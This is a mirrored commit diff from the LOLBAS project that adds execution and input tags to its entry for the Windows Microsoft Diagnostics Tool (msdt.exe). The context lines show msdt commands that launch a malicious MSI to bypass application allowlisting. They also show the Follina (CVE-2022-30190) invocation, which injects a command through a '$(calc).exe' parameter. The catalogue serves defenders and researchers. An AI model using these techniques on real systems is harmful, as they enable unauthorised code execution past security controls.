mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-11-04 10:39:56 +01:00 
			
		
		
		
	Update Msdt.yml Tags
Added Tags: Execute MSI Execute CMD Input Custom Format
This commit is contained in:
		@@ -13,6 +13,8 @@ Commands:
 | 
				
			|||||||
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
					    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
				
			||||||
    Tags:
 | 
					    Tags:
 | 
				
			||||||
      - Application: GUI
 | 
					      - Application: GUI
 | 
				
			||||||
 | 
					      - Execute: MSI
 | 
				
			||||||
 | 
					      - Input: Custom Format
 | 
				
			||||||
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 | 
					  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 | 
				
			||||||
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
 | 
					    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
 | 
				
			||||||
    Usecase: Execute code bypass Application whitelisting
 | 
					    Usecase: Execute code bypass Application whitelisting
 | 
				
			||||||
@@ -22,6 +24,8 @@ Commands:
 | 
				
			|||||||
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
					    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
				
			||||||
    Tags:
 | 
					    Tags:
 | 
				
			||||||
      - Application: GUI
 | 
					      - Application: GUI
 | 
				
			||||||
 | 
					      - Execute: MSI
 | 
				
			||||||
 | 
					      - Input: Custom Format
 | 
				
			||||||
  - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
 | 
					  - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
 | 
				
			||||||
    Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
 | 
					    Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
 | 
				
			||||||
    Usecase: Execute code bypass Application allowlisting
 | 
					    Usecase: Execute code bypass Application allowlisting
 | 
				
			||||||
@@ -31,6 +35,8 @@ Commands:
 | 
				
			|||||||
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
					    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
				
			||||||
    Tags:
 | 
					    Tags:
 | 
				
			||||||
      - Application: GUI
 | 
					      - Application: GUI
 | 
				
			||||||
 | 
					      - Execute: CMD
 | 
				
			||||||
 | 
					      - Input: Custom Format
 | 
				
			||||||
Full_Path:
 | 
					Full_Path:
 | 
				
			||||||
  - Path: C:\Windows\System32\Msdt.exe
 | 
					  - Path: C:\Windows\System32\Msdt.exe
 | 
				
			||||||
  - Path: C:\Windows\SysWOW64\Msdt.exe
 | 
					  - Path: C:\Windows\SysWOW64\Msdt.exe
 | 
				
			||||||
 
 | 
				
			|||||||
		Reference in New Issue
	
	Block a user